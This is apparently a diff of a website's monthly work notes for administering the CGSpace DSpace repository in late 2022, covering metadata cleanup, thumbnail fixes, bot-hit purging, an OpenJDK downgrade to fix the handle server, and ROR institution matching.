    • From June to October 2022 we suggested 39 new keywords; 27 were added to AGROVOC, 4 were rejected, and 9 are still under discussion
  • Doing a duplicate check on IFPRI’s batch upload, I found one duplicate uploaded by IWMI earlier this year
    • I will update the metadata of that item and map it to the correct Initiative collection
+

2022-11-03

+
  • I added countries to the twenty-three IFPRI items in OpenRefine based on their titles and abstracts (using the Jython trick I learned a few months ago), then added regions using csv-metadata-quality, and uploaded them to CGSpace
  • I exported a list of collections from CGSpace so I can run the thumbnail fixes on each one, as we seem to have issues when doing it on (some) large communities like the CRP community:
+
localhost/dspace= ☘ \COPY (SELECT ds6_collection2collectionhandle(uuid) AS collection FROM collection) to /tmp/collections.txt
+COPY 1268
+
  • Then I started a test run on DSpace Test:
+
$ while read -r collection; do chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails $collection | tee -a /tmp/FixLowQualityThumbnails.log; done < /tmp/collections.txt
+
  • I’ll be curious to check the log after it’s all done
    • After a few hours I see:
+
$ grep -c 'Action: remove' /tmp/FixLowQualityThumbnails.log 
+626
  • Not bad, because last week I did a more manual selection of collections and deleted ~200
    • I will replicate this on CGSpace soon, and also try the FixJpgJpgThumbnails tool
  • I see that the CIAT Library is still up, so I should really grab all the PDFs before they shut that old server down
    • Export a list of items with PDFs linked there:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=219 AND text_value LIKE '%ciat-library%') to /tmp/ciat-library-items.csv;
+COPY 4621
+
  • After stripping the page numbers off I see there are only about 2,700 unique files, and we have to filter out the dead JSPUI ones…
+
$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | grep -v jspui | sort -u | wc -l
+2752
+
  • I’m not sure how we’ll handle the duplicates, because many items are book chapters or similar that share a PDF (a sketch for mirroring the files is below)
+

2022-11-04

+
    +
  • I decided to check for old pre-ImageMagick thumbnails on CGSpace by finding any bitstreams with the description “Generated Thumbnail”:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT ds6_bitstream2itemhandle(dspace_object_id) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND text_value='Generated Thumbnail') to /tmp/old-thumbnails.txt;
+COPY 1147
+$ grep -v '\\N' /tmp/old-thumbnails.txt > /tmp/old-thumbnail-handles.txt
+$ wc -l /tmp/old-thumbnail-handles.txt 
+987 /tmp/old-thumbnail-handles.txt
+
    +
  • A bunch of these have \N for some reason when I use the ds6_bitstream2itemhandle function to get their handles so I had to exclude those… +
      +
    • I forced the media-filter for these items on CGSpace:
    • +
    +
  • +
+
$ while read -r handle; do JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i $handle -f -v; done < /tmp/old-thumbnail-handles.txt
+
    +
  • Upload some batch records via CSV for Peter
  • +
  • Update the about page on CGSpace with new text from Peter
  • +
  • Add a few more ORCID identifiers and names to my growing file 2022-09-22-add-orcids.csv +
      +
    • I tagged fifty-four new authors using this list
    • +
    +
  • +
  • I deleted and mapped one duplicate item for Maria Garruccio
  • +
  • I updated the CG Core website from Bootstrap v4.6 to v5.2
  • +
+

2022-11-07

+
    +
  • I did a harvest on AReS last night but it seems that MELSpace’s sitemap is broken again because we have 10,000 fewer records
  • +
  • I filed an issue on the iso-3166-1 npm package to update the name of Turkey to Türkiye +
      +
    • I also filed an issue and a pull request on the pycountry package
    • +
    • I also filed an issue and a pull request on the country-converter package
    • +
    • I also changed one item on CGSpace that had been submitted since the name was changed
    • +
    • I also imported the new iso-codes 4.12.0 into cgspace-java-helpers
    • +
    • I also updated it in the DSpace input-forms.xml
    • +
    • I also forked the iso-3166-1 package from npm and updated Swaziland, Macedonia, and Turkey in my fork + +
    • +
    +
  • +
  • Since I was making all these pull requests I also made one on country-converter for the UN M.49 region “South-eastern Asia”
  • +
  • Port the ImageMagick PDF cropbox fix to DSpace 6.x +
      +
    • I deployed it on CGSpace, ran all updates, and rebooted the host
    • +
    • I ran the filter-media script on one large collection where many of these PDFs with cropbox issues exist:
    • +
    +
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v -f -i 10568/78 >& /tmp/filter-media-cropbox.log
+
    +
  • But looking at the items it processed, I’m not sure it’s working as expected +
      +
    • I looked at a few dozen
    • +
    +
  • +
  • I found some links to the Bioversity website on CGSpace that are not redirecting properly:
  • +
+
$ http --print Hh http://www.bioversityinternational.org/nc/publications/publication/issue/geneflow_2004.html 
+GET /nc/publications/publication/issue/geneflow_2004.html HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: www.bioversityinternational.org
+User-Agent: HTTPie/3.2.1
+
+HTTP/1.1 302 Found
+Connection: Keep-Alive
+Content-Length: 275
+Content-Type: text/html; charset=iso-8859-1
+Date: Mon, 07 Nov 2022 16:35:21 GMT
+Keep-Alive: timeout=15, max=100
+Location: https://www.bioversityinternational.orgnc/publications/publication/issue/geneflow_2004.html
+Server: Apache
+
    +
  • The Location header is clearly wrong, and if I try https directly I get an HTTP 500
  • +
+

2022-11-08

+
    +
  • Looking at the Solr statistics hits on CGSpace for 2022-11 +
      +
    • I see 221.219.100.42 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent
    • +
    • I see 122.10.101.60 is in Hong Kong and making thousands of requests to XMLUI handles in a few hours, using a normal user agent
    • +
    • I see 135.125.21.38 on OVH is making thousands of requests trying to do SQL injection
    • +
    • I see 163.237.216.11 is somewhere in California making thousands of requests with a normal user agent
    • +
    • I see 51.254.154.148 on OVH is making thousands of requests trying to do SQL injection
    • +
    • I see 221.219.103.211 is on China Unicom and was making thousands of requests to XMLUI in a few hours, using a normal user agent
    • +
    • I see 216.218.223.53 on Hurricane Electric making thousands of requests to XMLUI in a few minutes using a normal user agent
    • +
    • I will purge all these hits and probably add China Unicom’s subnet mask to my nginx bot-network.conf file to tag them as bots since there are SO many bad and malicious requests coming from there
    • +
    +
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 8975 hits from 221.219.100.42 in statistics
+Purging 7577 hits from 122.10.101.60 in statistics
+Purging 6536 hits from 135.125.21.38 in statistics
+Purging 23950 hits from 163.237.216.11 in statistics
+Purging 4093 hits from 51.254.154.148 in statistics
+Purging 2797 hits from 221.219.103.211 in statistics
+Purging 2618 hits from 216.218.223.53 in statistics
+
+Total number of bot hits purged: 56546
+
    +
  • Also interesting to see a few new user agents: +
      +
    • RStudio Desktop (2022.7.1.554); R (4.2.1 x86_64-w64-mingw32 x86_64 mingw32)
    • +
    • rstudio.cloud R (4.2.1 x86_64-pc-linux-gnu x86_64 linux-gnu)
    • +
    • MEL
    • +
    • Gov employment data scraper ([[your email]])
    • +
    • RStudio Desktop (2021.9.0.351); R (4.1.1 x86_64-w64-mingw32 x86_64 mingw32)
    • +
    +
  • +
  • I will purge all these (the patterns file is sketched after the output below):
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
+Purging 6155 hits from RStudio in statistics
+Purging 1929 hits from rstudio in statistics
+Purging 1454 hits from MEL in statistics
+Purging 1094 hits from Gov employment data scraper in statistics
+
+Total number of bot hits purged: 10632
+
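    +
  • For reference, the patterns file that check-spider-hits.sh reads is just one user-agent pattern per line, so in this case it looked roughly like:
  • +
+
$ cat > /tmp/agents.txt <<'EOF'
+RStudio
+rstudio
+MEL
+Gov employment data scraper
+EOF
+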
    +
  • Work on the CIAT Library items a bit again in OpenRefine +
      +
    • I flagged items with: +
        +
      • URL containing “#page” at the end (these are linking to book chapters, but we don’t want to upload the PDF multiple times)
      • +
      • Same URL used by more than one item (“Duplicates” facet in OpenRefine, these are corner cases I don’t want to handle right now)
      • +
      • URL containing “:8080” to CIAT’s old DSpace (this server is no longer live)
      • +
      +
    • +
    • I want to try to handle the simple cases that should cover most of the items first (a rough command-line approximation of these flags is sketched below)
    • +
    +
  • +
+
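    +
  • For reference, the same three flags can be approximated on the command line (a rough sketch only; in practice I used the OpenRefine facets):
  • +
+
$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | grep '#page' > /tmp/ciat-chapter-urls.txt    # book chapter anchors
+$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | grep ':8080' > /tmp/ciat-old-dspace-urls.txt # links to CIAT's old DSpace
+$ csvcut -c url 2022-11-03-CIAT-Library-items.csv | sed 1d | sort | uniq -d > /tmp/ciat-shared-urls.txt   # same URL on more than one item
+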

2022-11-09

+
    +
  • Continue working on the Python script to upload PDFs from CIAT Library to the relevant item on CGSpace +
      +
    • I got the basic functionality working
    • +
    +
  • +
+

2022-11-12

+
    +
  • Start a harvest on AReS
  • +
+

2022-11-15

+
    +
  • Meeting with Marie-Angelique, Sara, and Valentina about CG Core types +
      +
    • We agreed to continue adding the feedback for each of the proposed actions
    • +
    • The others will start filling in definitions for the types
    • +
    • Sara had some good questions about duplicates on CGSpace and how we can possibly prevent them now that several systems are submitting items directly into the repository +
        +
      • We need to be especially careful with regard to authors’ outputs that will be reported in the PRMS
      • +
      +
    • +
    +
  • +
+

2022-11-16

+
    +
  • Maria asked if we can extend the timeout for XMLUI sessions +
      +
    • According to this issue it seems to be 30 minutes, which is the Tomcat default
    • +
    • I think we could extend this to an hour, as there is no real security risk (we’re not a bank) and most users’ lock screens would have activated after ten minutes or so anyway
    • +
    +
  • +
+

2022-11-20

+
    +
  • Start a harvest on AReS
  • +
+

2022-11-22

+
    +
  • Check and upload some items to CGSpace for Peter +
      +
    • I am waiting for some feedback from him about some duplicates and metadata issues for the rest
    • +
    +
  • +
+

2022-11-23

+
    +
  • Fix some authorization issues for ABC’s TIP submit tool on DSpace Test (the groups were correct on CGSpace, but not on test)
  • +
  • Peter sent me feedback about the duplicates and metadata questions from yesterday +
      +
    • I uploaded the eight items for COHESA and sixty-two for Gender
    • +
    +
  • +
  • I ran the script to tag ORCID identifiers with my 2022-09-22-add-orcids.csv file and tagged twenty-seven
  • +
  • Maria asked for help uploading a large PDF to CGSpace +
      +
    • The PDF is only two pages, but it is 139MB!
    • +
    • I decided to compress it with GhostScript, first with the screen profile (72dpi), then with the ebook profile (150dpi):
    • +
    +
  • +
+
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile=Key\ facts\ from\ a\ traditional\ colombian\ food\ market-screen.pdf Key\ facts\ from\ a\ traditional\ colombian\ food\ market.pdf
+$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=Key\ facts\ from\ a\ traditional\ colombian\ food\ market-ebook.pdf Key\ facts\ from\ a\ traditional\ colombian\ food\ market.pdf
+
+

2022-11-24

+
    +
  • My script finished downloading the CIAT Library PDFs +
      +
    • I did some more work on my post-ciat-pdfs.py script and tested uploading the items to my local DSpace and DSpace Test
    • +
    • Then I ran the script on CGSpace, uploading ~1,500 PDFs to existing items
    • +
    +
  • +
+

2022-11-25

+
    +
  • Tony Murray, who is working on IFPRI’s CGSpace integration, emailed me to ask some questions about the REST API
  • +
  • Oh no, I realized there is a logic issue with the PDFbox cropbox code I added a few weeks ago:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v -f -i 10568/77010
+The following MediaFilters are enabled:
+Full Filter Name: org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
+org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
+Loading @mire database changes for module MQM
+Changes have been processed
+IM Thumbnail tropentag2016_marshall.pdf is replacable.
+File: tropentag2016_marshall.pdf.jpg
+ERROR filtering, skipping bitstream:
+
+        Item Handle: 10568/77010
+        Bundle Name: ORIGINAL
+        File Size: 1486580
+        Checksum: 1ad66d918a56a5e84667386e1a32e352 (MD5)
+        Asset Store: 0
+java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
+java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
+        at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:325)
+        at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:248)
+        at org.apache.pdfbox.pdmodel.PDDocument.getPage(PDDocument.java:1543)
+        at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:167)
+        at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:27)
+        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
+        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
+        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
+        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
+        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:232)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • Salem gave me a list of CGSpace collections that have double spaces in the names +
      +
    • Normally this would only be a minor annoyance, but he discovered that the REST API seems to trim the spaces, which causes an issue when trying to reference them!
    • +
    • He sent me a list of about ten collection UUIDs so I fixed them
    • +
    +
  • +
  • I found a bunch of LIVES presentations on CGSpace that link to presentations on SlideShare with incorrect licenses… I updated about fifty of them
  • +
+

2022-11-26

+
    +
  • Sync DSpace Test with CGSpace
  • +
  • I increased the session timeout in Tomcat from thirty minutes to sixty, as requested by Maria a few weeks ago + +
  • +
  • I re-built DSpace on CGSpace, ran all updates, and rebooted the machine +
      +
    • Then, after the server came back up, the handle server wouldn’t start
    • +
    • The handle-server.log file shows:
    • +
    +
  • +
+
Shutting down...
+"2022/11/26 02:12:17 CET" 25 Rotating log files
+Error: null
+       (see the error log for details.)
+
    +
  • In the error.log file I see:
  • +
+
"2022/11/26 02:12:18 CET" 25 Started new run.
+java.lang.UnsupportedOperationException
+        at java.lang.Runtime.runFinalizersOnExit(Runtime.java:287)
+        at java.lang.System.runFinalizersOnExit(System.java:1059)
+        at net.handle.server.Main.initialize(Main.java:124)
+        at net.handle.server.Main.main(Main.java:75)
+Shutting down...
+
    +
  • Checking the dpkg log, I see that OpenJDK 8 was upgraded on this host a couple of weeks ago:
  • +
+
Upgrade: openjdk-8-jdk-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04), openjdk-8-jre-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04)
+End-Date: 2022-11-10  04:10:45
+
    +
  • This matches a change noted in the OpenJDK 8u352 update, which explains the UnsupportedOperationException from Runtime.runFinalizersOnExit:
  • +
+
  - JDK-8287132: Retire Runtime.runFinalizersOnExit so that it always throws UOE
+
    +
  • I downloaded the previous versions of the packages from Launchpad:
  • +
+
# wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jdk-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
+# wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jre-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
+# dpkg -i openjdk-8-j*8u342-b07*.deb
+
    +
  • Then the handle-server process starts up fine, so I held these OpenJDK versions for now:
  • +
+
# apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
+openjdk-8-jdk-headless set on hold.
+openjdk-8-jre-headless set on hold.
+
    +
  • Start a harvest on AReS
  • +
+

2022-11-27

+
    +
  • I realized I made a mistake in the PDF CropBox code I wrote for dspace-api a few weeks ago +
      +
    • For PDFs with only one page I was seeing this in the filter-media output:
    • +
    +
  • +
+
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
+
    +
  • It turns out that PDDocument’s getPage() is zero-based
  • +
  • I also updated PDFBox from 2.0.24 to 2.0.27
  • +
  • I synced DSpace 7 Test with CGSpace +
      +
    • I had to follow my notes from 2022-03 to delete the missing Atmire migrations
    • +
    +
  • +
+

2022-11-28

+
    +
  • Update ilri/fix-metadata-values.py to update the last_modified date for items when it updates metadata +
      +
    • This should allow us to use the normal index-discovery (without -b) and have REST API responses show a correct last modified date
    • +
    +
  • +
  • Maria asked me to add some ORCID identifiers for Alliance staff to the controlled vocabulary +
      +
    • I also updated the add-orcid-identifiers-csv.py to update the last_modified timestamp of the item
    • +
    +
  • +
  • I re-factored my CGSpace Python scripts to use a helper util.py module with common functions +
      +
    • For now it only has the one for updating an item’s last_modified timestamp but I will gradually add more
    • +
    +
  • +
  • I also ran our list of ORCID identifiers against ORCID’s API to see if anyone changed their name format +
      +
    • Then I ran them on CGSpace with ilri/update-orcids.py to fix them
    • +
    +
  • +
  • Normalize the text_lang values for CGSpace metadata again:
  • +
+
localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang │  count
+───────────┼─────────
+ en_US     │ 2912429
+           │  108387
+ en        │   12457
+ fr        │       2
+ vi        │       2
+ es        │       1
+ ␀         │       0
+(7 rows)
+
+Time: 624.651 ms
+localhost/dspacetest= ☘ BEGIN;
+BEGIN
+Time: 0.130 ms
+localhost/dspacetest= ☘ UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '');
+UPDATE 120844
+Time: 4074.879 ms (00:04.075)
+localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang │  count  
+───────────┼─────────
+ en_US     │ 3033273
+ fr        │       2
+ vi        │       2
+ es        │       1
+ ␀         │       0
+(5 rows)
+
+Time: 346.913 ms
+localhost/dspacetest= ☘ COMMIT;
+
    +
  • Discussing the UN M.49 regions on CGSpace with Valentina and Abenet + +
  • +
  • I exported a CSV of the Initiatives and ran the csv-metadata-quality script to add missing UN M.49 regions +
      +
    • To make sure everything was correct I got a list of the changes from csv-metadata-quality and checked them all manually on the UN M.49 site, just in case there was another bug in country_converter
    • +
    • This fixed regions for about fifty items
    • +
    +
  • +
  • I dumped the UN M.49 regions from the CSV on the UNSD website:
  • +
+
$ csvcut -d";" -c 'Region Name,Sub-region Name,Intermediate Region Name' ~/Downloads/UNSD\ \ Methodology.csv | sed -e 1d -e 's/,/\n/g' | sort -u
+
+Africa
+Americas
+Asia
+Australia and New Zealand
+Caribbean
+Central America
+Central Asia
+Channel Islands
+Eastern Africa
+Eastern Asia
+Eastern Europe
+Europe
+Latin America and the Caribbean
+Melanesia
+Micronesia
+Middle Africa
+Northern Africa
+Northern America
+Northern Europe
+Oceania
+Polynesia
+South America
+South-eastern Asia
+Southern Africa
+Southern Asia
+Southern Europe
+Sub-Saharan Africa
+Western Africa
+Western Asia
+Western Europe
+
    +
  • For now I will combine it with our existing list, which contains a few legacy regions, while we discuss a long-term plan with Peter and Abenet
  • +
  • Peter wrote to ask me to change the PIM CRP’s full name from Policies, Institutions and Markets to Policies, Institutions, and Markets +
      +
    • It’s apparently the only CRP with an Oxford comma…?
    • +
    • I updated them all on CGSpace
    • +
    +
  • +
  • Also, I ran index-discovery without -b, since my metadata update scripts now update the last_modified timestamp as well; it finished in fifteen minutes and I see the changes in the Discovery search and facets
  • +
+

2022-11-29

+
    +
  • Meeting with Marie-Angelique, Abenet, Sara, Valentina, and Margarita about dcterms.type for CG Core +
      +
    • We discussed some of the feedback from Peter
    • +
    +
  • +
  • Peter and Abenet and I agreed to update some of our metadata in response to the PRMS feedback +
      +
    • I updated Pacific to Oceania, and Central Africa to Middle Africa, and removed the old ones from the submission form
    • +
    • These are UN M.49 regions
    • +
    +
  • +
+

2022-11-30

+
    +
  • I ran csv-metadata-quality on an export of the ILRI community on CGSpace, but only with title, country, and region fields +
      +
    • It fixed some whitespace issues and added missing regions to about 1,200 items
    • +
    +
  • +
  • I thought of a way to delete duplicate metadata values, since the CSV upload method can’t detect them correctly +
      +
    • First, I wrote a SQL query to identify metadata values with the same text_value, metadata_field_id, and dspace_object_id:
    • +
    +
  • +
+
\COPY (SELECT a.text_value, a.metadata_value_id, a.metadata_field_id, a.dspace_object_id 
+    FROM metadatavalue a
+    JOIN (
+        SELECT dspace_object_id, text_value, metadata_field_id, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id NOT IN (11, 12, 28, 136, 159) GROUP BY dspace_object_id, text_value, metadata_field_id HAVING COUNT(*) > 1
+    ) b
+    ON a.dspace_object_id = b.dspace_object_id
+    AND a.text_value = b.text_value
+    AND a.metadata_field_id = b.metadata_field_id
+    ORDER BY a.text_value) TO /tmp/duplicates.txt
+
    +
  • (This query excludes metadata for accession and available dates, provenance, format, etc)
  • +
  • Then, I sorted the file by fields four and one (dspace_object_id and text_value) so that the duplicate metadata for each item were next to each other, used awk to print the second field (metadata_value_id) from every other line, and created a SQL script to delete the metadata
  • +
+
$ sort -k4,1 /tmp/duplicates.txt    | \
+    awk -F'\t' 'NR%2==0 {print $2}' | \
+    sed 's/^\(.*\)$/DELETE FROM metadatavalue WHERE metadata_value_id=\1;/' > /tmp/delete-duplicates.sql
+
    +
  • This worked very well, but there were some metadata values that were tripled or quadrupled, so it only deleted the first duplicate +
      +
    • I just ran it again two more times to find the last duplicates, now we have none!
    • +
    +
  • +
  • I also generated another SQL file with commands to update the last modified timestamps of these items:
  • +
+
$ awk -F'\t' '{print $4}' /tmp/duplicates.txt | sort -u | sed "s/^\(.*\)$/UPDATE item SET last_modified=NOW() WHERE uuid='\1';/" > /tmp/update-timestamp.sql
+
    +
  • Tezira said she was having trouble archiving submissions +
      +
    • In the afternoon I looked and found a high number of locks:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c | sort -n
+     60 dspaceCli
+    176 dspaceApi
+   1194 dspaceWeb
+

PostgreSQL database locks

+
    +
  • The timing looks suspiciously close to when I was running the batch updates on the ILRI community this morning. +
      +
    • I restarted Tomcat and PostgreSQL and everything was back to normal
    • +
    +
  • +
  • I found some items on CGSpace in Dinka, Ndogo, and Bari languages, but the dcterms.language field was “other” +
      +
    • That’s so unfortunate! These languages are not in ISO 639-1, but they are in ISO 639-3, which uses three-letter (alpha-3) codes and has room for many more languages
    • +
    • I changed them from other to use the three-letter codes, and I will suggest to the CG Core group that we use ISO 639-3 in the future
    • +
    +
  • +
  • Send feedback to Salem about some metadata issues with MEL submissions to CGSpace
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2022-12/index.html b/docs/2022-12/index.html new file mode 100644 index 000000000..cc12a8cf4 --- /dev/null +++ b/docs/2022-12/index.html @@ -0,0 +1,631 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + December, 2022 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

December, 2022

+ +
+

2022-12-01

+
    +
  • Fix some incorrect regions on CGSpace +
      +
    • I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions (a sketch of the workflow is below)
    • +
    +
  • +
  • Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
  • +
  • Replace “East Asia” with “Eastern Asia” region on CGSpace (UN M.49 region)
  • +
+
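    +
  • A rough sketch of that region-fixing workflow on one of the exports (file names are illustrative; the csv-metadata-quality options are from memory, so check its --help):
  • +
+
$ csvcut -c 'id,collection,cg.coverage.country[en_US],cg.coverage.region[en_US]' /tmp/ccafs.csv > /tmp/ccafs-regions.csv
+$ csv-metadata-quality -i /tmp/ccafs-regions.csv -o /tmp/ccafs-regions-fixed.csv # add -u if region fixes count as "unsafe" fixes in your version
+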
    +
  • CGSpace and PRMS information session with Enrico and a bunch of researchers
  • +
  • I noticed some minor issues with SPDX licenses and AGROVOC terms in items submitted by TIP so I sent a message to Daniel from Alliance
  • +
  • I started a harvest on AReS since we’ve updated so much metadata recently
  • +
+

2022-12-02

+ +

2022-12-03

+
    +
  • I downloaded a fresh copy of CLARISA’s institutions list as well as ROR’s latest dump from 2022-12-01 to check how many are matching:
  • +
+
$ curl -s https://api.clarisa.cgiar.org/api/institutions | json_pp > ~/Downloads/2022-12-03-CLARISA-institutions.json
+$ jq -r '.[] | .name' ~/Downloads/2022-12-03-CLARISA-institutions.json > ~/Downloads/2022-12-03-CLARISA-institutions.txt
+$ ./ilri/ror-lookup.py -i ~/Downloads/2022-12-03-CLARISA-institutions.txt -o /tmp/clarisa-ror-matches.csv -r v1.15-2022-12-01-ror-data.json
+$ csvgrep -c matched -m true /tmp/clarisa-ror-matches.csv | wc -l
+1864
+$ wc -l ~/Downloads/2022-12-03-CLARISA-institutions.txt
+7060 /home/aorth/Downloads/2022-12-03-CLARISA-institutions.txt
+
    +
  • Out of the box they match 26.4%, but there are many institutions with multiple languages in the text value, as well as countries in parentheses so I think it could be higher
  • +
  • If I replace the slashes and remove the countries at the end there are slightly more matches, around 29%:
  • +
+
$ sed -e 's_ / _\n_' -e 's_/_\n_' -e 's/ \?(.*)$//' ~/Downloads/2022-12-03-CLARISA-institutions.txt > ~/Downloads/2022-12-03-CLARISA-institutions-alan.txt
+
    +
  • I checked CGSpace’s top 1,000 affiliations too, first exporting from PostgreSQL:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2022-11-22-affiliations.csv;
+
    +
  • Then cutting out the first field (tab is the default delimiter):
  • +
+
$ cut -f 1 /tmp/2022-11-22-affiliations.csv > 2022-11-22-affiliations.txt
+$ ./ilri/ror-lookup.py -i 2022-11-22-affiliations.txt -o /tmp/cgspace-matches.csv -r v1.15-2022-12-01-ror-data.json
+$ csvgrep -c matched -m true /tmp/cgspace-matches.csv | wc -l
+542
+
    +
  • So that’s a 54% match for our top affiliations (the calculation is sketched at the end of this entry)
  • +
  • I realized we should actually check affiliations and sponsors, since those are stored in separate fields +
      +
    • When I add those the matches go down a bit to 45%
    • +
    +
  • +
  • Oh man, I realized institutions like Université d'Abomey Calavi don’t match in ROR because they are like this in the JSON:
  • +
+
"name": "Universit\u00e9 d'Abomey-Calavi"
+
    +
  • So we likely match a bunch more than 50%…
  • +
  • I exported a list of affiliations and donors from CGSpace for Peter to look over and send corrections
  • +
+
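    +
  • For the record, the match percentage can be computed from ror-lookup.py’s output with something like this (csvgrep is from csvkit):
  • +
+
$ total=$(sed 1d /tmp/cgspace-matches.csv | wc -l)
+$ matched=$(csvgrep -c matched -m true /tmp/cgspace-matches.csv | sed 1d | wc -l)
+$ echo "scale=1; 100 * $matched / $total" | bc
+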

2022-12-05

+
    +
  • First day of PRMS technical workshop in Rome
  • +
  • Last night I submitted a CSV import with changes to 1,500 Alliance items (adding regions) and it hadn’t completed after twenty-four hours so I canceled it +
      +
    • Not sure if there is some rollback that will happen or what state the database will be in, so I will wait a few hours to see what happens before trying to modify those items again
    • +
    • I started it again a few hours later with a subset of the items and 4GB of RAM instead of 2 (see the sketch at the end of this entry)
    • +
    • It completed successfully…
    • +
    +
  • +
+
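    +
  • Assuming the command-line importer, the re-run with more memory looks something like this (the file name is illustrative, and some DSpace versions also want -e with an eperson email):
  • +
+
$ JAVA_OPTS="-Xmx4096m -Dfile.encoding=UTF-8" dspace metadata-import -f /tmp/2022-12-05-alliance-regions-subset.csv
+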

2022-12-07

+
    +
  • I found a bug in my csv-metadata-quality script regarding the regions +
      +
    • I was accidentally checking cg.coverage.subregion due to a sloppy regex
    • +
    • This means I’ve added a few thousand UN M.49 regions to the cg.coverage.subregion field in the last few days
    • +
    • I had to extract them from CGSpace and delete them using delete-metadata-values.py
    • +
    +
  • +
  • My DSpace 7.x pull request to tell ImageMagick about the PDF CropBox was merged
  • +
  • Start a harvest on AReS
  • +
+

2022-12-08

+
    +
  • While on the plane I decided to fix some ORCID identifiers, as I had seen some poorly formatted ones +
      +
    • I couldn’t remember the XPath syntax so this was kinda ghetto:
    • +
    +
  • +
+
$ xmllint --xpath '//node/isComposedBy/node()' dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE 'label=".*"' | sed -e 's/label="//' -e 's/"$//' > /tmp/orcid-names.txt
+$ ./ilri/update-orcids.py -i /tmp/orcid-names.txt -db dspace -u dspace -p 'fuuu' -m 247
+
    +
  • After that there were still some poorly formatted ones that my script didn’t fix, so perhaps these are new ones not in our list +
      +
    • I dumped them and combined with the existing ones to resolve later:
    • +
    +
  • +
+
